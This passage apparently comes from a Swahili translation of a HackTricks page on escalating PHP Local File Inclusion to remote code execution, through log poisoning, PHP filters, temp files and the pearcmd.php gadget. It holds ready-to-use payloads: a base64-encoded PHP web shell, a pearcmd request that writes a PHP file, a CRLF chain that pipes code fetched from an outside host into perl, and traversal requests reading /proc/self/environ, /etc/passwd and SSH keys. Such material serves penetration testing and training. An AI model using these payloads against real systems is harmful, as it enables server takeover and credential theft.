login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm2

Kupitia ssh

Ikiwa ssh inafanya kazi, angalia ni mtumiaji gani anatumika (/proc/self/status & /etc/passwd) na jaribu kufikia <HOME>/.ssh/id_rsa

Kupitia vsftpd logs

Rekodi za server ya FTP vsftpd ziko katika /var/log/vsftpd.log. Katika senario ambapo kuna udhaifu wa Local File Inclusion (LFI), na ufikivu kwa server ya vsftpd iliyo wazi unapotowezekana, hatua zifuatazo zinaweza kuzingatiwa:

1. Injiza PHP payload kwenye field ya username wakati wa mchakato wa login.
2. Baada ya injection, tumia LFI kupata server logs kutoka /var/log/vsftpd.log.

Kupitia php base64 filter (using base64)

Kama inavyoonyeshwa katika this article, PHP base64 filter inapuuza tu Non-base64. Unaweza kutumia hilo kupitisha ukaguzi wa extension ya faili: ikiwa utatoa base64 inayomalizika na “.php”, itaepuka tu “.” na itaongeza “php” kwenye base64. Hapa kuna mfano wa payload:

http://example.com/index.php?page=PHP://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+.php

NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"

Kupitia php filters (hakuna faili inahitajika)

This writeup inaeleza kuwa unaweza kutumia php filters to generate arbitrary content kama output. Hii kwa msingi inamaanisha unaweza generate arbitrary php code kwa include without needing to write ndani ya faili.

LFI2RCE via PHP Filters

Kupitia segmentation fault

Pakia faili itakayohifadhiwa kama temporary katika /tmp, kisha katika same request, chochea segmentation fault, na kisha faili ya temporary haitafutwa hivyo utaweza kuitafuta.

LFI2RCE via Segmentation Fault

Kupitia Nginx temp file storage

Ikiwa umepata Local File Inclusion na Nginx iko mbele ya PHP, unaweza kupata RCE kwa mbinu ifuatayo:

LFI2RCE via Nginx temp files

Kupitia PHP_SESSION_UPLOAD_PROGRESS

Ikiwa umepata Local File Inclusion hata kama huna session na session.auto_start iko Off. Ikiwa utatoa PHP_SESSION_UPLOAD_PROGRESS katika data ya multipart POST, PHP itakuwa imeanzisha the session for you. Hii inaweza kutumika kupata RCE:

LFI2RCE via PHP_SESSION_UPLOAD_PROGRESS

Kupitia temp file uploads katika Windows

Ikiwa umepata Local File Inclusion na server inafanya kazi kwenye Windows, unaweza kupata RCE:

LFI2RCE Via temp file uploads

Kupitia pearcmd.php + URL args

As explained in this post, script /usr/local/lib/phppearcmd.php ipo kwa default katika php docker images. Zaidi ya hayo, inawezekana kupitisha arguments kwa script kupitia URL kwa sababu inasemwa kwamba param ya URL isiyo na = inapaswa kutumika kama argument. Angalia pia watchTowr’s write-up na Orange Tsai’s “Confusion Attacks”.

The following request create a file in /tmp/hello.php with the content <?=phpinfo()?>:

GET /index.php?+config-create+/&file=/usr/local/lib/php/pearcmd.php&/<?=phpinfo()?>+/tmp/hello.php HTTP/1.1

Ifuatayo inatumia CRLF vuln kupata RCE (kutoka here):

http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/ooo? %2b run-tests %2b -ui %2b $(curl${IFS}orange.tw/x|perl) %2b alltests.php %0d%0a
Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/usr/local/lib/php/pearcmd.php %0d%0a
%0d%0a

Kupitia phpinfo() (file_uploads = on)

Ikiwa umepata Local File Inclusion na faili inayoonyesha phpinfo() na file_uploads = on unaweza kupata RCE:

LFI2RCE via phpinfo()

Kupitia compress.zlib + PHP_STREAM_PREFER_STUDIO + Path Disclosure

Ikiwa umepata Local File Inclusion na unaweza can exfiltrate the path ya faili ya muda LAKINI server inafanya checking ikiwa file to be included has PHP marks, unaweza jaribu bypass that check kwa kutumia Race Condition:

LFI2RCE Via compress.zlib + PHP_STREAM_PREFER_STUDIO + Path Disclosure

Kupitia eternal waiting + bruteforce

Ikiwa unaweza kutumia LFI ili upload temporary files na kufanya server hang utekelezaji wa PHP, unaweza kisha brute force filenames during hours kutafuta faili ya muda:

LFI2RCE via Eternal waiting

Kwa Fatal Error

Kama utaingiza yoyote ya faili /usr/bin/phar, /usr/bin/phar7, /usr/bin/phar.phar7, /usr/bin/phar.phar. (Unahitaji kuingiza ile ile mara 2 ili kusababisha error hiyo).

Sijui jinsi hili linavyoweza kuwa muhimu lakini linaweza kuwa.
Hata kama unasababisha PHP Fatal Error, PHP temporary files zilizopakuliwa zinafutwa.

Preserve traversal sequences from the client

Baadhi ya HTTP clients hurekebisha au kushusha ../ kabla request kufika server, na hivyo kuharibu directory traversal payloads. Tumia curl --path-as-is ili kuweka traversal bila kubadilika unapotumiza endpoints za log/download zinazoongeza filename inayodhibitiwa na user, na ongeza --ignore-content-length kwa pseudo-files kama /proc:

curl --path-as-is -b "session=$SESSION" \
"http://TARGET/admin/get_system_log?log_identifier=../../../../proc/self/environ" \
--ignore-content-length -s | tr '\000' '\n'

Rekebisha idadi ya sehemu za ../ mpaka utoke kwenye directory iliyokusudiwa, kisha dump /etc/passwd, /proc/self/cwd/app.py, au other source/config files.

Marejeo

• PayloadsAllTheThings
• PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal/Intruders
• Horizon3.ai – From Support Ticket to Zero Day (FreeFlow Core path traversal → arbitrary write → webshell)
• Xerox Security Bulletin 025-013 – FreeFlow Core 8.0.5
• watchTowr – We need to talk about PHP (pearcmd.php gadget)
• Orange Tsai – Confusion Attacks on Apache
• VTENEXT 25.02 – a three-way path to RCE
• The Art of PHP: CTF‑born exploits and techniques
• When Audits Fail: Four Critical Pre-Auth Vulnerabilities in TRUfusion Enterprise
• Positive Technologies – Blind Trust: What Is Hidden Behind the Process of Creating Your PDF File?
• HTB: Imagery (admin log download traversal + /proc/self/environ read)

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.